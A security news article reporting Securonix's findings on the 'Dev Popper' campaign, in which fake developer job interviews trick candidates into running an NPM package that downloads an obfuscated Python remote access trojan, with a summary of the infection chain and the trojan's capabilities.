Fake Developer Interviews Used to Install Python Backdoor

By Ava McKinneyOnline Safety

Fake Developer Interviews Used to Spread Python Backdoor

Security analysts at Securonix have uncovered a new campaign called Dev Popper, which targets software developers. Hackers are conducting fake job interviews to trick victims into installing a Python-based remote access trojan (RAT).

The Dev Popper attacks use a multi-stage infection chain based on social engineering, gradually compromising victims through deception. Researchers believe these attacks are likely organized by North Korean threat actors, but there is not enough evidence for a definitive attribution.

According to the researchers, the hackers “exploit developers’ professional engagement and their trust in the hiring process, where refusing to follow an interviewer’s instructions could jeopardize their job prospects,” making these attacks highly effective.

How the Attack Works

Typically, hackers pose as employers with supposed job openings for developers. During the interview, they ask candidates to download and complete a task from a GitHub repository. The real goal, however, is to get the victim to download malware that collects system information and gives attackers remote access to the host.

The “task” file is usually a ZIP archive containing an NPM package, which includes a README.md file and frontend and backend directories. When the developer runs this NPM package, an obfuscated JavaScript file (imageDetails.js) hidden in the backend directory is triggered. This file uses Node.js to execute curl commands, downloading an additional archive (p.zi) from an external server.

Inside this archive is the next stage payload—an obfuscated Python script (npl), which acts as a remote access trojan.

Capabilities of the RAT

Once the RAT is activated on the victim’s system, it collects and sends key system information to a command-and-control server, including OS type, hostname, and network parameters. According to Securonix, the RAT has the following capabilities:

  • Establishing a persistent connection for ongoing control
  • Searching for and stealing specific files and data from the file system
  • Remotely executing commands to deploy additional exploits and malware
  • Direct FTP exfiltration of data from folders like Documents and Downloads
  • Monitoring clipboard contents and keystrokes to track user activity and potentially capture credentials

Background and Warnings

In recent years, there have been numerous warnings (1, 2, 3, 4) that North Korean hackers are using fake job offers to make contact and subsequently compromise cybersecurity researchers, media organizations, software developers (especially those working on DeFi platforms), and employees in the aerospace sector.

Leave a Reply